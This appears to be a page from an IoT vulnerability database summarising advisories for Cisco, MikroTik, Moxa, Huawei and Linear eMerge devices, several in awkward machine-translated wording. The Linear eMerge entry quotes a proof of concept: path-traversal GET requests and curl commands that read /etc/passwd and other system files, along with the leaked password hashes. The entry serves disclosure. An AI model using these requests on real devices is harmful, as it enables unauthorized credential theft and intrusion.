VARIoT IoT vulnerabilities database

A vulnerability in the REST API for software device management in Cisco Application Policy Infrastructure Controller (APIC) Software could allow an authenticated, remote attacker to escalate privileges to root on an affected device. The vulnerability is due to incomplete validation and error checking for the file path when specific software is uploaded. An attacker could exploit this vulnerability by uploading malicious software using the REST API. A successful exploit could allow an attacker to escalate their privilege level to root. The attacker would need to have the administrator role on the device. This issue is being tracked by Cisco Bug ID CSCvp64857. The vulnerability stems from the lack of effective permissions and access control measures in network systems or products

A vulnerability in the FTP daemon on MikroTik routers through 6.44.3 could allow remote attackers to exhaust all available memory, causing the device to reboot because of uncontrolled resource management. MikroTik router Contains a resource exhaustion vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. MikroTikrouters is a router product from MikroTik, Latvia. There are security vulnerabilities in the FTP daemons of MikroTikrouters 6.44.3 and earlier

DIGISOL DG-HR3400 devices have XSS via a modified SSID when the apssid value is unchanged. DIGISOL DG-HR3400 The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. DIGISOLSYSTEMSDG-HR3400 is a wireless router from DIGISOLSYSTEMS, India. A cross-site scripting vulnerability exists in DIGISOLSYSTEMSDG-HR3400. The vulnerability stems from the lack of proper validation of client data for web applications. An attacker could exploit the vulnerability to execute client code

Moxa OnCell G3100-HSPA Series version 1.6 Build 17100315 and prior use a proprietary configuration protocol that does not provide confidentiality, integrity, and authenticity security controls. All information is sent in plain text, and can be intercepted and modified. Any commands (including device reboot, configuration download or upload, or firmware upgrade) are accepted and executed by the device without authentication. Moxa OnCell G3100-HSPA The series contains a vulnerability related to access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MoxaOnCellG3100-HSPA is a G3100-HSPA series cellular network gateway device from Moxa Corporation of Taiwan, China. A security feature issue vulnerability exists in MoxaOnCellG3100-HSPA1.6Build17100315 and earlier. The vulnerability stems from the lack of security measures such as authentication, access control, and rights management in the network system or product. There are currently no detailed details of the vulnerability provided

Moxa OnCell G3100-HSPA Series version 1.6 Build 17100315 and prior use a proprietary monitoring protocol that does not provide confidentiality, integrity, and authenticity security controls. All information is sent in plain text, and can be intercepted and modified. The protocol is vulnerable to remote unauthenticated disclosure of sensitive information, including the administrator's password. Under certain conditions, it's also possible to retrieve additional information, such as content of HTTP requests to the device, or the previously used password, due to memory leakages. Moxa OnCell G3100-HSPA The series contains an information disclosure vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MoxaOnCellG3100-HSPA is a G3100-HSPA series cellular network gateway device from Moxa Corporation of Taiwan, China. A security feature issue vulnerability exists in MoxaOnCellG3100-HSPASeries1.6Build17100315 and earlier. The vulnerability stems from the lack of security measures such as authentication, access control, and rights management in the network system or product. There are currently no detailed details of the vulnerability provided

There is Memory corruption in the web interface of Moxa OnCell G3100-HSPA Series version 1.5 Build 17042015 and prio,r a different vulnerability than CVE-2018-11423. Moxa OnCell G3100-HSPA The series contains a resource exhaustion vulnerability. This vulnerability CVE-2018-11423 Is a different vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MoxaOnCellG3100-HSPA is a G3100-HSPA series cellular network gateway device from Moxa Corporation of Taiwan, China. An attacker could exploit this vulnerability to corrupt memory

There is Memory corruption in the web interface of Moxa OnCell G3470A-LTE Series version 1.6 Build 18021314 and prior, a different vulnerability than CVE-2018-11425. Moxa OnCell G3470A-LTE The series includes NULL A vulnerability related to pointer dereference exists. This vulnerability CVE-2018-11425 Is a different vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. MoxaOnCellG3470A-LTE is a G3470A-LTE series cellular network gateway device from Moxa Corporation of Taiwan, China. An attacker could exploit this vulnerability to corrupt memory

There is Memory corruption in the web interface Moxa OnCell G3100-HSPA Series version 1.6 Build 17100315 and prior, different vulnerability than CVE-2018-11420. Moxa OnCell G3100-HSPA The series contains a buffer error vulnerability. This vulnerability CVE-2018-11420 Is a different vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. MoxaOnCellG3100-HSPA is a G3100-HSPA series cellular network gateway device from Moxa Corporation of Taiwan, China. An attacker could exploit this vulnerability to corrupt memory

CSRF tokens are not used in the web application of Moxa OnCell G3100-HSPA Series version 1.4 Build 16062919 and prior, which makes it possible to perform CSRF attacks on the device administrator. Moxa OnCell G3100-HSPA The series contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa OnCell G3100-HSPA is a G3100-HSPA series cellular network gateway device from Moxa Corporation of Taiwan, China. This vulnerability stems from the fact that the WEB application does not fully verify that the request is from a trusted user. An attacker could exploit the vulnerability to send an unexpected request to the server through an affected client

Memory corruption issue was discovered in Moxa OnCell G3470A-LTE Series version 1.6 Build 18021314 and prior, a different vulnerability than CVE-2018-11424. Moxa OnCell G3470A-LTE The series contains a buffer error vulnerability. This vulnerability CVE-2018-11424 Is a different vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MoxaOnCellG3470A-LTE is a G3470A-LTE series cellular network gateway device from Moxa Corporation of Taiwan, China. A memory corruption vulnerability exists in MoxaOnCellG3470A-LTE1.6Build18021314 and earlier. An attacker could exploit this vulnerability to corrupt memory. There are security vulnerabilities in Moxa OnCell G3470A-LTE 1.6 Build 18021314 and earlier versions

A weak Cookie parameter is used in the web application of Moxa OnCell G3100-HSPA Series version 1.4 Build 16062919 and prior. An attacker can brute force parameters required to bypass authentication and access the web interface to use all its functions except for password change. Moxa OnCell G3100-HSPA There are authentication vulnerabilities in the series.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MoxaOnCellG3100-HSPA is a G3100-HSPA series cellular network gateway device from Moxa Corporation of Taiwan, China. A security vulnerability exists in MoxaOnCellG3100-HSPA1.4Build16062919 and earlier

There is a path traversal vulnerability on Huawei Share. The software does not properly validate the path, an attacker could crafted a file path when transporting file through Huawei Share, successful exploit could allow the attacker to transport a file to arbitrary path on the phone. Affected products: Mate 20 X versions earlier than Ever-L29B 9.1.0.300(C432E3R1P12), versions earlier than Ever-L29B 9.1.0.300(C636E3R2P1), and versions earlier than Ever-L29B 9.1.0.300(C185E3R3P1). Huawei Mate 20 X Contains a path traversal vulnerability.Information may be tampered with. HuaweiMate20X is a smartphone from China's Huawei company

Multiple vulnerabilities in the RSS dashboard in the web-based management interface of Cisco Firepower Management Center (FMC) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface of the affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. These issues are being tracked by Cisco Bug IDs CSCvo90805 and CSCvo92913

A vulnerability in the web interface of Cisco Small Business 200, 300, and 500 Series Managed Switches could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper validation of requests sent to the web interface. An attacker could exploit this vulnerability by sending a malicious request to the web interface of an affected device. A successful exploit could allow the attacker to cause an unexpected reload of the device, resulting in a DoS condition. This issue is being tracked by Cisco Bug IDs CSCvp43403, and CSCvp43417

A vulnerability in Cisco Advanced Malware Protection (AMP) for Endpoints for Windows could allow an authenticated, local attacker with administrator privileges to execute arbitrary code. The vulnerability is due to insufficient validation of dynamically loaded modules. An attacker could exploit this vulnerability by placing a file in a specific location in the Windows filesystem. A successful exploit could allow the attacker to execute the code with the privileges of the AMP service. This issue is being tracked by Cisco Bug ID CSCvp53361

A vulnerability in Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an authenticated, local attacker to execute arbitrary commands on the underlying operating system (OS) of an affected device as root. The vulnerability is due to insufficient input validation of a configuration file that is accessible to a local shell user. An attacker could exploit this vulnerability by including malicious input during the execution of this file. A successful exploit could allow the attacker to execute arbitrary commands on the underlying OS as root. This issue is being tracked by Cisco Bug ID CSCvn12421. The platform can realize the full lifecycle management of virtualized services through the central coordinator and controller

A vulnerability in Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an authenticated, remote attacker with administrator privileges to overwrite or read arbitrary files on the underlying operating system (OS) of an affected device. The vulnerability is due to improper input validation in NFVIS filesystem commands. An attacker could exploit this vulnerability by using crafted variables during the execution of an affected command. A successful exploit could allow the attacker to overwrite or read arbitrary files on the underlying OS. Cisco Enterprise NFV Infrastructure Software (NFVIS) Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Cisco Enterprise NFV Infrastructure Software is prone to an arbitrary file-overwrite vulnerability. This issue is being tracked by Cisco Bug ID CSCvn12407. The platform can realize the full lifecycle management of virtualized services through the central coordinator and controller

Linear eMerge E3-Series devices allow File Inclusion. Linear eMerge E3 Series devices contain vulnerabilities related to authorization, privileges, and access control.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. A security vulnerability exists in Nortek Security & Control Linear eMerge E3-Series. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. Linear eMerge E3 Unauthenticated Directory Traversal File Disclosure Affected version: <=1.00-06 CVE: CVE-2019-7254 Advisory: https://applied-risk.com/resources/ar-2019-005 by Gjoko 'LiquidWorm' Krstic GET /?c=../../../../../../etc/passwd%00 Host: 192.168.1.2 root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/home/default: e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh curl -s http://192.168.1.3/badging/badge_print_v0.php?tpl=../../../../../etc/passwd curl -s http://192.168.1.2/badging/badge_template_print.php?tpl=../../../../../etc/version curl -s http://192.168.1.2/badging/badge_template_v0.php?layout=../../../../../../../etc/issue curl -s http://192.168.1.2/?c=../../../../../../etc/passwd%00

Linear eMerge E3-Series devices have Cleartext Credentials in a Database. Linear eMerge E3 series devices contain a vulnerability related to certificate/password management.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security & Control Linear eMerge E3-Series is an access control device from Nortek Security & Control, USA. Nortek Security & Control Linear eMerge E3-Series has a trust management issue vulnerability. Attackers can use this vulnerability to obtain clear text passwords and launch further attacks on the system. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements

Linear eMerge E3-Series devices allow Remote Code Execution (root access over SSH). Linear eMerge E3 series devices contain a vulnerability related to the use of hardcoded credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security & Control Linear eMerge E3-Series has a trust management issue vulnerability. An attacker could exploit this vulnerability to execute code